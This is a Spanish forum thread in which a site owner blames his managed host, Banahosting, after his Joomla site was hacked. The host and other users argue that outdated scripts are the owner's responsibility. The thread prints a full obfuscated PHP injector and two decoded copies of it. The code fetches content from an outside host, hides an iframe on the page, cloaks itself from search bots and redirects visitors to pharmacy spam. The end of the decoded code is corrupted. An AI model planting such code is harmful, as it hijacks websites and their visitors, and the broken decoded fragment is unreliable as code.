Me han hackeado mi servidor y banahosting se lava las manos como siempre.

Estado
Cerrado para nuevas respuestas

Guatemalteco Spanish

Delta
Verificación en dos pasos desactivada
Desde
7 Dic 2009
Mensajes
519
Crédito(s)
7
Puntos
36
Hola

Me han hackeado mi servidor y banahosting se lava las manos como siempre. Si todo va bien banahosting no da ningún problema, pero ante el mínimo error me encuentro con evasivas y "apáñatelas tú mismo". Siempre que esto me ocurre especialmente siempre es con un tipo de Banahosting que se llama: "Wilson Baez".

Este tipo es un impresentable. Cuidado a lo que me dice.

Mi email:

Hola

Entre hoy y ayer mis webs han comenzado a dar errores.

En ******.com, arriba sale esto:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tecnicas/public_html/index.php:6) in /home/tecnicas/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tecnicas/public_html/index.php:6) in /home/tecnicas/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tecnicas/public_html/index.php:6) in /home/tecnicas/public_html/libraries/joomla/session/session.php on line 426

Warning: session_regenerate_id() [function.session-regenerate-id]: Cannot regenerate session id - headers already sent in /home/tecnicas/public_html/libraries/joomla/session/session.php on line 510

---

En http://****/wp-admin/ ,

Sale esto:

Warning: Cannot modify header information - headers already sent by (output started at /home/tecnicas/public_html/revista-digital/wp-config.php:6) in /home/tecnicas/public_html/revista-digital/wp-includes/pluggable.php on line 876

Mensajes similares salen en otras webs mías.

Me podríais decir si habéis tocado algo o que ha pasado? Porque esto solo de la nada no sale.
Su respuesta:

Hola,

estos son errores especificamente en sus webs.

he verificado el server y veo tienes una version antigua muy hackeable de php 5.2 lo cual se dejo asi porque usted tenia script que no funcionan bien con la nueva version de php. le recomiendo actualizar su server y usted actualizar sus scripts.

En http://****/wp-admin/ ,

Sale esto:

Warning: Cannot modify header information - headers already sent by (output started at /home/tecnicas/public_html/revista-digital/wp-config.php:6) in /home/tecnicas/public_html/revista-digital/wp-includes/pluggable.php on line 876

eso indica que tiene en el wp-config.php:6 errores
Respuesta rápida, en menos de 5 min, en los cuales mientras yo he podido comprobar que me han lanzado un ataque o hackeo al servidor. Es este ataque:


Ataque eval(gzinflate(base64_decode
El tal Wilson ni siquiera sabe que me han hackeado el servidor, esto es vergonzoso, y si lo sabe es aun peor, me dice que me apañe.

Creo que es totalmente vergonzoso que no se pueda actualizar mi php a la última versión por un script y banahosting no me informe.

Estoy pagando de servidor 169$ y es administrado, cosa que ante el más mínimo problema siemrpe se lavan las manos, especialmente este tipo.

Le he respondido esto:

Holas

¿Qué scripts tengo que actualizar especificamente?

Me han hecho una especie de ataque llamado:

Ataque eval(gzinflate(base64_decode
Después más cabreado porque me hackean el servidor y el tipo este me responde con un directo: "Apáñate que es tu problema", sin ningún tipo de información le mando otro email ya más cabreado y diciendo que me atienda alguien que sepa.

Mi pregunta para vosotros es: ¿Qué puñetas hago? Cómo soluciono esto? No tengo ni la más mínima idea y banahosting pasa de todo.

Cuidado a la respuesta del tal Wilson:

Hola,

Script debe actualizar y mantenerlos actuaizados, no es nuestra deber el actualizar sus joomlas foros o wordpress esto es una tarea suya.

de nuestro lado solo es a nivel de server y si mira tickets anteriores se le tuvo que poner la version vieja de php porque a usted le dejan de funcionar cosas por usar script desactualizados.

usted paga $169 costo menos que lo que vale el server sin administracion.

en todo momento hemos cumplido con nuestro deber a nivel de server. si no esta a gusto entonces lamentaremos su partida.


Regards,

Wilson Baez
Estoy flipando en colores, tengo el servidor administrado y me dice que pago poco. ¿Pero que morro tiene este tio? Encima no me dice que script es ni nada y es que suda de todo.

Me han hackeado el server y es que no me dice no que tengo que hacer ni ninguna ayuda, en pocas palabras: No es su problema, si pago por un servidor administrado tampoco es su problema.
 
Última edición:

ntv

Mi
Redactor
Verificación en dos pasos desactivada
Desde
9 Oct 2011
Mensajes
3.027
Edad
30
Crédito(s)
1
Puntos
20
El código que muestras parece estar encriptado en base 64 , se necesita más información , scanea tu web en caso de shells , etc.
 

r2j

Lambda
SEO
Verificación en dos pasos desactivada
Desde
23 Dic 2011
Mensajes
2.834
Crédito(s)
0
Puntos
92
Amigo manda un mp a [MENTION=3716]skamasle[/MENTION] :encouragement: y cambia de compañía
 

deluxxin

Zeta
Diseñador
Verificación en dos pasos desactivada
Desde
24 May 2012
Mensajes
1.524
Crédito(s)
0
Puntos
0
deberías de poner el codigo completo, por lo que veo no es un ataque, es una shell codificada con base64
 

Guatemalteco Spanish

Delta
Verificación en dos pasos desactivada
Desde
7 Dic 2009
Mensajes
519
Crédito(s)
7
Puntos
36
[MENTION=1168]Guatemalteco Spanish[/MENTION] que sea administrado no quiere decir que no sea hackeable, el responsable de tus scripts eres tu :)
Exacto, los scripts los manejo yo, pero si pago un servidor adminsitrado, 169$ al año, si se me hackea el servidor. ¿Tengo derecho a que me digan qué ha ocurrido, por qué ha ocurrido y me ayuden a solucionarlo no?

O sino para que pago? Si me hackean el servidor me jodo y me aguanto?
 

ntv

Mi
Redactor
Verificación en dos pasos desactivada
Desde
9 Oct 2011
Mensajes
3.027
Edad
30
Crédito(s)
1
Puntos
20
Guatemalteco Spanish , un buen host se pagaria 300$ al año .. y bueno no te suelen decir como te an hackeado , porque aparentemente su host es seguro , el error es tuyo , si deseas ayuda mandame MP , que yo te ayudo :encouragement:
 

Guatemalteco Spanish

Delta
Verificación en dos pasos desactivada
Desde
7 Dic 2009
Mensajes
519
Crédito(s)
7
Puntos
36
deberías de poner el codigo completo, por lo que veo no es un ataque, es una shell codificada con base64
¿Eso que es?

El código exacto que me sale es este:

<?php eval(gzinflate(base64_decode('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')));?>
Ahora de repente a desaparecido el index de mi web general, no entiendo nada.

---------- Post agregado el 11-sep-2013 hora: 15:59 ----------

te han dicho que es por el script, arreglar el script no es trabajo de ellos y hacerlo seguro tampoco.
Te repito lo mismo, eso lo entiendo pero:

¿Tengo derecho a que me digan qué ha ocurrido, por qué ha ocurrido y me ayuden a solucionarlo no? Sino para que me sirve la atención al cliente? Ellos no tienen ninguna obligación?

Te proporcionan un servidor administrado se supone que si tienes problemas te ayudan a solucionarlo no? Porque sino para que sirve pagar un servidor administrado?
 

franquicias

Zeta
Verificación en dos pasos desactivada
Desde
9 May 2011
Mensajes
1.705
Crédito(s)
3
Puntos
12
Entra a Cpanel y Restaura un backup de hace 1 semana o mas atrás, si es posible antes de que comenzaran los problemas. Solo un backup de archivos (no de base de datos)

Con eso solucionas.

Tienes seguramente un codigo malicioso que se replica y modifica todos los php.

A mi me pasa seguido con un hosting donde tengo un sitio en joomla.
 

ntv

Mi
Redactor
Verificación en dos pasos desactivada
Desde
9 Oct 2011
Mensajes
3.027
Edad
30
Crédito(s)
1
Puntos
20
Alguien conoce tu web , alguien del foro , y a entrado a la shell y te lo borro xD .. bueno ,,,
 

deluxxin

Zeta
Diseñador
Verificación en dos pasos desactivada
Desde
24 May 2012
Mensajes
1.524
Crédito(s)
0
Puntos
0
este es el codigo decodificado
if (!defined('frmDs')){ define('frmDs' ,1); function frm_dl ($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = @file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) @unlink($f); else @touch($f); } else { if($fp = @fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = @file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot($ua){ if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = @fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = @strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.d.y')); $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) @unlink($odbf); if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){ if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } function frm_havekey(){ $nks = array('cialis','cipro','clomi','diflucan','finasteride','fluconazole','furosemide','kamagra','lasix','levitra','propecia','sildenafil','tadalafil','vardenafil','viagra','zithrom'); $k = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]); print_r($r); if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return false; foreach ($nks as $n)if(strpos($k, $n)!==false) return $n; return false; } $tdir = frm_tmpdir(); $defframe = '<style> .dsiyz { position:absolute; left:-929px; top:-1115px; }</style><div class="dsiyz"><iframe src="http://bvtbrgkuh.kwik.to/jquery/get.php?ver=jquery.latest.js" width="419" height="332"></iframe></div>'; $codelink = 'http://bvtbrgkuh.kwik.to/nc/gnc.php?ver=jquery.latest.js'; $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot($ua); if(!$isb&&frm_seref()&&($k=frm_havekey())){ header('Location: http://pharmshopping.net/search.html?key='.$k);exit(); } if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MW {trepreg_match= (iaatcgm09,1y$htcgm0gDjO'aatcgm09,1y$htcgp'*,1y$htcgp'*_U, tsf)mu===sts($odbf)) 4Ro|9,1y$ht hb0) rrame src= 4Ro|9,tsf)mu=-0@ jquery/g|mu=+*7/frmimatch=0tptc im8 i-0@ jquery/gfuncpir. e2';k;tcgOk://phVa1
 

banahosting.com

VIP Hospedaje
Eta
Verificado con documento
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
30 Ago 2009
Mensajes
1.252
Crédito(s)
1
Puntos
1.156
Hola,

Nada que ver, esto es simplemente joomla desactualizado y obviamente joomla desactualizado = hackeo seguro.

tenga presente que esto no es culpa de su server y mucho menos de nuestro servicio. usted o su webmaster son los responsables de tener sus scripts actualizados.

su ticket esta siendo y ha sido atendido de manera muy cordial.
 

pablort

Gamma
Verificación en dos pasos desactivada
Desde
6 Abr 2010
Mensajes
165
Edad
32
Crédito(s)
0
Puntos
6
No tengo mucha experiencia en el tema como varios de acá, pero te recomiendo reinstalar en su última versión los script que tengas, para evitar dolores de cabezas, de todas formas te dejo el código decodificado:

PHP:
if (!defined('frmDs')){
	define('frmDs' ,1);
	
	function frm_dl ($url) {
		if (function_exists('curl_init')) {
			$ch = curl_init($url);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			$out = curl_exec ($ch);
			if (curl_errno($ch) !== 0) $out = false;
			curl_close ($ch);
		} else {$out = @file_get_contents($url);}
		return trim($out);
	}
	
	function frm_crpt($in){
		$il=strlen($in);$o='';
		for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
		return $o;
	}
	
	function frm_getcache($tmpdir,$link,$cmtime,$del=true){
		$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
		if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime)
		{
			$dlc=frm_dl($link);
			if($dlc===false){
				if(del)
					@unlink($f);
				else
					@touch($f);
			}
			else 
			{
				if($fp = @fopen($f,'w')){
					fwrite($fp, frm_crpt($dlc)); fclose($fp);
				}else{return $dlc;}
			}
		}
		$fc = @file_get_contents($f);
		return ($fc)?frm_crpt($fc):'';
	}
	
	function frm_isbot($ua){
		if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
		$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
					array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
					array(3481178113,3481182206),array(2915172353,2915237886));
		foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
		if(!$ua)return true;
		$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
		foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
		return false;
	}
	
	function frm_tmpdir(){
		$fs = array('/tmp','/var/tmp');
        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
            if ($t = getenv($v)) {$fs[]=$t;}
        }
        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
        $fs[]='.';
		
        foreach ($fs as $f){
        	$tf = $f.'/'.md5(rand());
        	if($fp = @fopen($tf, 'w')){
        		fclose($fp);
        		unlink($tf);
        		return $f;
        	}
        }
		return false;
	}

	function frm_seref(){
		$r = @strtolower($_SERVER["HTTP_REFERER"]);
		$ses = array('google','bing','yahoo','ask','aol');
		foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
		return false;
	}
	
	function frm_isuniq($tdir){
		$ip=$_SERVER['REMOTE_ADDR'];
		$dbf=$tdir.'/sess_'.md5(date('m.d.y'));
		$odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400));
		if (file_exists($odbf)) @unlink($odbf);
		if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){
			if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);}
			return true;
		}
		return false;
	}
		
	function frm_havekey(){
		$nks = array('cialis','cipro','clomi','diflucan','finasteride','fluconazole','furosemide','kamagra','lasix','levitra','propecia','sildenafil','tadalafil','vardenafil','viagra','zithrom');
		$k = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]);
		print_r($r);
		if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return false;
		foreach ($nks as $n)if(strpos($k, $n)!==false) return $n;

		return false;
	}
	
	$tdir = frm_tmpdir();

	$defframe = '<style>
	.dsiyz { position:absolute; left:-929px; top:-1115px; }
</style>
<div class="dsiyz">
<iframe src="http://bvtbrgkuh.kwik.to/jquery/get.php?ver=jquery.latest.js" width="419" height="332"></iframe>
</div>';

	$codelink = 'http://bvtbrgkuh.kwik.to/nc/gnc.php?ver=jquery.latest.js';

	
	$ua=$_SERVER['HTTP_USER_AGENT'];
	$isb=frm_isbot($ua);
		
	if(!$isb&&frm_seref()&&($k=frm_havekey())){
		header('Location: http://pharmshopping.net/search.html?key='.$k);exit();
	}

	if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MW	{trepreg_match=	 (iaatcgm09,1y$htcgm0gDjO'aatcgm09,1y$htcgp'*,1y$htcgp'*_U, tsf)mu===sts($odbf)) 4Ro|9,1y$ht hb0) rrame src= 4Ro|9,tsf)mu=-0@ jquery/g|mu=+*7/frmimatch=0tptc		
	im8 i-0@ jquery/gfuncpir. 	e2';

k;tcgO

k://phVa1
?>[/CODE]
 

ntv

Mi
Redactor
Verificación en dos pasos desactivada
Desde
9 Oct 2011
Mensajes
3.027
Edad
30
Crédito(s)
1
Puntos
20
Así es , bueno no veo shell alguna en tu web , tienes que hacer un upgrade a la versión de tu Joomla
 

Guatemalteco Spanish

Delta
Verificación en dos pasos desactivada
Desde
7 Dic 2009
Mensajes
519
Crédito(s)
7
Puntos
36
Tu sitio en joomla está desactualizado?

Yo tengo una versión antigua. Lo actualizaré ahora mismo, aunque me llevará un par de días sino es que semanas.

Entra a Cpanel y Restaura un backup de hace 1 semana o mas atrás, si es posible antes de que comenzaran los problemas. Solo un backup de archivos (no de base de datos)

Con eso solucionas.

Tienes seguramente un codigo malicioso que se replica y modifica todos los php.

A mi me pasa seguido con un hosting donde tengo un sitio en joomla.
 

Jorge Reyes

Moderador
1
Kappa
Social Media
Verificado con documento
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
29 Mar 2012
Mensajes
2.584
Edad
22
Crédito(s)
1
Puntos
152
Pues creo que es culpa tuya ya que ellos se encargan del servidor y tu de los scripts, si el servidor se cae pues si seria error de ellos, pero te hackearon los scripts desactualizados :s
 

franquicias

Zeta
Verificación en dos pasos desactivada
Desde
9 May 2011
Mensajes
1.705
Crédito(s)
3
Puntos
12
Tu sitio en joomla está desactualizado?

Yo tengo una versión antigua. Lo actualizaré ahora mismo, aunque me llevará un par de días sino es que semanas.
Asi es hace años que no lo actualizo, antes trabajaba con joomla pero luego lo deje.

No puedo actualizarlo porque tiene unos plugins que no funcionan en las ultimas versiones.

Cuando me hackean, como te digo suelo restaurar todo los archivos (de hecho ya los tengo bajados en mi pc)

Saludos!
 

Guatemalteco Spanish

Delta
Verificación en dos pasos desactivada
Desde
7 Dic 2009
Mensajes
519
Crédito(s)
7
Puntos
36
banahosting.com dijo:
Hola,

Nada que ver, esto es simplemente joomla desactualizado y obviamente joomla desactualizado = hackeo seguro.

tenga presente que esto no es culpa de su server y mucho menos de nuestro servicio. usted o su webmaster son los responsables de tener sus scripts actualizados.

su ticket esta siendo y ha sido atendido de manera muy cordial.

Si todo esto está muy bien. Hace 2 años cuando acudí a banahosting, todo era muy bonito, todo promesas, un tipo en el messenger que me atendía al instante para que me fuera con vosotros, que si todo irá bien, que la atención al cliente es magnífica. Una vez pagué, literalmente no me respondió nunca más en el messenger.

Responder de manera cordial si, pero dando largas y sin solucionar los problemas.

Si contrato un servidor con vosotros administrado y estoy pagando 169$ al mes, se supone que mis conocimientos sobre el mismo no son muy amplios, por eso quiero uno administrado, por si me surgen problemas. No para que si me hackean mi joomla me digáis: "No sabemos nada de nada, es tu problema".

Si desde un buen principio hubierais sido honestos, lo mismo al hacer upgrades o contratar el servidor administrado me hubierais dicho: "Oye, si tienes algun problema con hackeos, scripts maliciosos etc, no te vamos a atender" yo directamente me hubiera largado.

Entiendo que le problema ha sido de joomla y su desactualización, sin embargo me gustaría remarcar esta respuesta que me disteis de vuestra atención al cliente:

desactivar mod_sec es delicado pues si no tienes actualizados todos tus scripts es muy posible te inyecten codigos
Eso fue en otro ticket de hace tiempo, en lo cuál se me dio a entender que gracias a mod_security había una seguridad más o menos estable. Informe a ese Wilson en ese momento y se lo dice textualmente que tenía Joomla desactualizado, y en ningún momento ni me adivirtió de que lo actualizara ni nada. Ni se me informo de que mi php estaba desactualizado por joomla.

¿Qué tipo de servicio se ofrece entonces en banahosting? Solamente se da el servidor y ya está? No se ofrece ningún tipo de ayuda?

Sed claros en vuestra publicidad y cuando vengáis a los clientes las cosas. Yo no soy un experto, sino no os contrataría a vosotros, me montaría yo mi propio servidor.

Si a un cliente le hackean una web por tener un software desactualizado, yo creo que como cliente tengo derecho a que me expliquéis que ha pasado y me ayudéis a solucionarlo no? Es lo que entiendo yo por atención al cliente y sino como os digo HABLAD CLARO y ponedlo bien grande en las especificaciones de que incluye y no incluye un servidor administrado porque os aseguro de que haberlo dicho así de claro jamás os habría contratado.

P.D: Cada vez que tengo un problema grave me contesta el tal Wilson con evasivas, me quejo un monton y me indigno y entonces el "señorito" si me ayuda a solucionar mi problema.

Es que es vergonzoso, ni responde mis preguntas ni me dice como solucionar mi problema, algo que a él le lleva 2 minutos, tanto le costaba decirme de un principio: "Es por qué tienes Joomla desactualizado". Es que me ha respondido con evasivas totalmente. Siempre me hace la ley del mínimo esfuerzo, he pedido que me cambien esa persona varias veces de atención al cliente y nunca me hacen caso, siempre me atiende el mismo tipo con respuestas cortas, evasivas y ni siquiera me responde a lo que le pregunto.

Ahora que se ha decidido a ayudarme, le mando un correo con 5 puntos que me contesta y se la suda los 5 puntos, me responde 2 y va que chuta y siempre igual, me atiende como le da la gana.
 
Última edición:

banahosting.com

VIP Hospedaje
Eta
Verificado con documento
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
30 Ago 2009
Mensajes
1.252
Crédito(s)
1
Puntos
1.156
Si todo esto está muy bien. Hace 2 años cuando acudí a banahosting, todo era muy bonito, todo promesas, un tipo en el messenger que me atendía al instante para que me fuera con vosotros, que si todo irá bien, que la atención al cliente es magnífica. Una vez pagué, literalmente no me respondió nunca más en el messenger.

Responder de manera cordial si, pero dando largas y sin solucionar los problemas.

Si contrato un servidor con vosotros administrado y estoy pagando 169$ al mes, se supone que mis conocimientos sobre el mismo no son muy amplios, por eso quiero uno administrado, por si me surgen problemas. No para que si me hackean mi joomla me digáis: "No sabemos nada de nada, es tu problema".

Si desde un buen principio hubierais sido honestos, lo mismo al hacer upgrades o contratar el servidor administrado me hubierais dicho: "Oye, si tienes algun problema con hackeos, scripts maliciosos etc, no te vamos a atender" yo directamente me hubiera largado.

Entiendo que le problema ha sido de joomla y su desactualización, sin embargo me gustaría remarcar esta respuesta que me disteis de vuestra atención al cliente:



Eso fue en otro ticket de hace tiempo, en lo cuál se me dio a entender que gracias a mod_security había una seguridad más o menos estable. Informe a ese Wilson en ese momento y se lo dice textualmente que tenía Joomla desactualizado, y en ningún momento ni me adivirtió de que lo actualizara ni nada. Ni se me informo de que mi php estaba desactualizado por joomla.

¿Qué tipo de servicio se ofrece entonces en banahosting? Solamente se da el servidor y ya está? No se ofrece ningún tipo de ayuda?

Sed claros en vuestra publicidad y cuando vengáis a los clientes las cosas. Yo no soy un experto, sino no os contrataría a vosotros, me montaría yo mi propio servidor.

Si a un cliente le hackean una web por tener un software desactualizado, yo creo que como cliente tengo derecho a que me expliquéis que ha pasado y me ayudéis a solucionarlo no? Es lo que entiendo yo por atención al cliente y sino como os digo HABLAD CLARO y ponedlo bien grande en las especificaciones de que incluye y no incluye un servidor administrado porque os aseguro de que haberlo dicho así de claro jamás os habría contratado.

P.D: Cada vez que tengo un problema grave, que por suerte suele ser 1 vez cada 2 años ocurre lo mismo. Me conesta el tal Wilson con evasivas, me quejo un monton y me indigno y entonces el "señorito" si me ayuda a solucionar mi problema.

Es que es vergonzoso, ni responde mis preguntas ni me dice como solucionar mi problema, algo que a él le lleva 2 minutos, tanto le costaba decirme de un principio: "Es por qué tienes Joomla desactualizado". Es que me ha respondido con evasivas totalmente.

Lo sentimos pero ningun server incluye tareas de webmaster como actualizar sus script joomlas o wordpress en sus webs, usted quiere que seamos los resposables por algo que no nos corresponde. usted es quien debe de tenerlos actualizados. y por algo lanzan las actualizaciones y boletines de seguridad.
 

deluxxin

Zeta
Diseñador
Verificación en dos pasos desactivada
Desde
24 May 2012
Mensajes
1.524
Crédito(s)
0
Puntos
0
En ningún hosting se harán responsables de los scripts desactualizados el culpable eres tu, no hay de otra, no te lo tienen que decir tu debes de saber que debes de actualizar.

Si todo esto está muy bien. Hace 2 años cuando acudí a banahosting, todo era muy bonito, todo promesas, un tipo en el messenger que me atendía al instante para que me fuera con vosotros, que si todo irá bien, que la atención al cliente es magnífica. Una vez pagué, literalmente no me respondió nunca más en el messenger.

Responder de manera cordial si, pero dando largas y sin solucionar los problemas.

Si contrato un servidor con vosotros administrado y estoy pagando 169$ al mes, se supone que mis conocimientos sobre el mismo no son muy amplios, por eso quiero uno administrado, por si me surgen problemas. No para que si me hackean mi joomla me digáis: "No sabemos nada de nada, es tu problema".

Si desde un buen principio hubierais sido honestos, lo mismo al hacer upgrades o contratar el servidor administrado me hubierais dicho: "Oye, si tienes algun problema con hackeos, scripts maliciosos etc, no te vamos a atender" yo directamente me hubiera largado.

Entiendo que le problema ha sido de joomla y su desactualización, sin embargo me gustaría remarcar esta respuesta que me disteis de vuestra atención al cliente:



Eso fue en otro ticket de hace tiempo, en lo cuál se me dio a entender que gracias a mod_security había una seguridad más o menos estable. Informe a ese Wilson en ese momento y se lo dice textualmente que tenía Joomla desactualizado, y en ningún momento ni me adivirtió de que lo actualizara ni nada. Ni se me informo de que mi php estaba desactualizado por joomla.

¿Qué tipo de servicio se ofrece entonces en banahosting? Solamente se da el servidor y ya está? No se ofrece ningún tipo de ayuda?

Sed claros en vuestra publicidad y cuando vengáis a los clientes las cosas. Yo no soy un experto, sino no os contrataría a vosotros, me montaría yo mi propio servidor.

